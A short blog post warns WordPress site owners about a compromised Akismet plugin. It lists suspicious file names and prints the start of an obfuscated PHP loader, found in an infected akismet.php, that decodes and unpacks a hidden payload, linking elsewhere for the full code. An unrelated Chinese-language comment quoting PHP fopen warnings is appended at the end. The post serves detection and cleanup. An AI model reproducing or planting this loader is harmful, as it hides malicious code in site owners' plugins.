If your WordPress site has been compromised, try checking out your Akismet plugin. It’s so commonly used that its often subject to attacks.
If any of these files are showing up in your plugins folder, you may be the subject of an attack:
.akismet.cache.php
.akismet.bak.php
.akismet.old.php
class-akismet.php
db-akismet.php
One akismet.php file that I found started out something like this:
<?php if (!function_exists("TC9A16C47DA8EEE87")) { function TC9A16C47DA8EEE87($T059EC46CFE335260) { $T059EC46CFE335260 = base64_decode($T059EC46CFE335260); $TC9A16C47DA8EEE87 = 0; $TA7FB8B0A1C0E2E9E = 0; $T17D35BB9DF7A47E4 = 0; $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]); $TBF14159DC7D007D3 = 3; $T77605D5F26DD5248 = 0; $T4A747C3263CA7A55 = 16; $T7C7E72B89B83E235 = ""; $T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260); $T43D5686285035C13 = __FILE__; $T43D5686285035C13 = file_get_contents($T43D5686285035C13); $T6BBC58A3B5B11DC4 = 0; preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $T43D5686285035C13, $T6BBC58A3B5B11DC4); for (;$TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E;) { if (count($T6BBC58A3B5B11DC4)) exit; if ($T4A747C3263CA7A55 == 0) { $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8); $T65CE9F6823D588A7+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]); $T4A747C3263CA7A55 = 16; } if ($T65CE9F6823D588A7 & 0x8000) { $TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4); $TC9A16C47DA8EEE87+= (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4); if ($TC9A16C47DA8EEE87) { $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3; for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++) $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 - $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4]; $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E; } else { $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8); $TA7FB8B0A1C0E2E9E+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16; for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]); $TBF14159DC7D007D3++; $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E; } } else $T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++]; $T65CE9F6823D588A7 <<= 1; $T4A747C3263CA7A55--; if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) { $T43D5686285035C13 = implode("", $T7C7E72B89B83E235); $T43D5686285035C13 = "?" . ">" . $T43D5686285035C13; return $T43D5686285035C13; } } } }; ?>
If you want the PHP code, which is obfuscated, for the akismet.php file I came across, visit this page: http://codepaste.net/jc2996
See this post regarding the Pharma Hack for more information.
在wordpress3.2下会报错,提供日志给楼主分析。Warning: fopen(xxxx/wp-content/themes/iBluety/style.css) [function.fopen]: failed to open seratm: No such file or directory in xxxx/wp-includes/functions.php on line 4339Warning: fread(): supplied argument is not a valid seratm resource in xxxx/wp-includes/functions.php on line 4342Warning: fclose(): supplied argument is not a valid seratm resource in xxxx/wp-includes/functions.php on line 4345Reply